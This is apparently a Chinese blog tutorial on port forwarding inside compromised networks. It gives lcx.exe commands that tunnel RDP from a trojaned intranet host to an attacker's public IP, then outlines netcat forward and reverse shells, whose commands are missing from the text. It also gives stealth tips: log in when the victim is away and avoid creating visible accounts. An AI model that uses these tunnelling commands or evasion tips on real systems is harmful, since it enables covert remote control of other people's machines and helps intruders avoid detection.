內網滲透之端口轉發

內網端口轉發最多見的不外乎lcx與nc反彈了，很久不用快忘了，今天總結一下

 一.使用lcx進行內網端口轉發

Lcx.exe是一個端口轉發工具，至關於把目標服務器A上的3389端口轉發到具備外網ip地址的B機上（即咱們本身的主機或是已經控制的主機），這樣連接B機的3389端口就至關於連接A機的3389端口了，Lcx程序多用於被控制計算機處於內網的時候，被控制機可能中了木馬程序，雖然可以進行控制，但仍是沒有使用遠程終端登陸到本機進行管理方便，所以在不少狀況下，都會千方百計在被控制計算機上開啓3389端口，而後經過lcx等進行端口轉發，進而在本地鏈接到被控制計算機的遠程終端並進行管理和使用。

1.肯定被控制計算機的IP地址

ipconfig /all查看網絡配置狀況，例如被控計算機的IP爲192.168.80.129

二、在被控制計算機上執行端口轉發命令

lcx.exe –slave 公網IP +端口 內網IP +端口

在被控制計算機上（A機）執行 lcx -slave 218.69.13.35 51 192.168.80.129 3389,執行完成後會給出一些提示。以下圖：

                                             

說明：

lcx一共有三條命令，第一條命令（lcx -listen 51 3389）（3389能夠設置爲任意沒使用的端口數字）是在具備外網獨立IP的計算機上執行（即B機），表示在本機上監聽51端口，該端口主要是接受被控制計算機3389端口轉發過來的數據；第二條命令（lcx -slave 218.69.13.35 51 192.168.80.129 3389）表示將本機IP地址爲192.168.80.129的3389端口轉發到遠程地址爲218.69.13.35的51端口上；第三條命令式端口轉向。

3.在本機上執行監聽命令

在本機cmd下執行 lcx -listen 51 3389命令，監聽51端口，監聽成功後，會顯示以下圖：

注：這個時候已經將內網的3389轉發到了公網機器的3389端口，咱們在本地機器上遠程公網IP+3389 ，就鏈接上了內網機器的3389

                                             

注意：

（1）在本機上監聽的端口必須是未使用的端口，可使用 netstat -an |find 「51」命令來進行查看，若是沒有顯示結果則是表示51端口能夠用來進行監聽。

(2)被控制計算機與本機成功創建鏈接後會不停的顯示鏈接數據，若是未出現發送數據和接受的狀況，說明鏈接創建不成功。以下圖:

                                             

4.在本機使用遠程終端進行登陸

打開遠程終端鏈接器，輸入127.0.0.1進行鏈接後，便可遠程進入被控制計算機的桌面，

                                             

注意：
（1）若是被控制的計算機是服務器，則在登陸時能夠直接進行登錄；若是被控制計算機是windows系統，則最好選擇用戶不在計算機的時間進行登錄，不然容易被發現；

（2）不要輕易在被控制計算機上創建帳號，尤爲是windows，創建帳號後，會當即在登錄界面中進行顯示。

 

二.nc反彈

最好記的就是用真實操做來作筆記了

nc反彈有正向鏈接與反向鏈接

環境：本機：192.168.43.142(win7) 遠程機器：192.168.43.137(xp) 

1.nc正向鏈接

在遠程機

---返回xp的cmdshell

在本機

成功以後，本地機器就得到了一個遠程機器的shell

 

 2.nc反向鏈接

在本機運行上

在遠程機

而後成功以後，咱們在本地機器上看一下，已經得到了遠程機器的cmdshell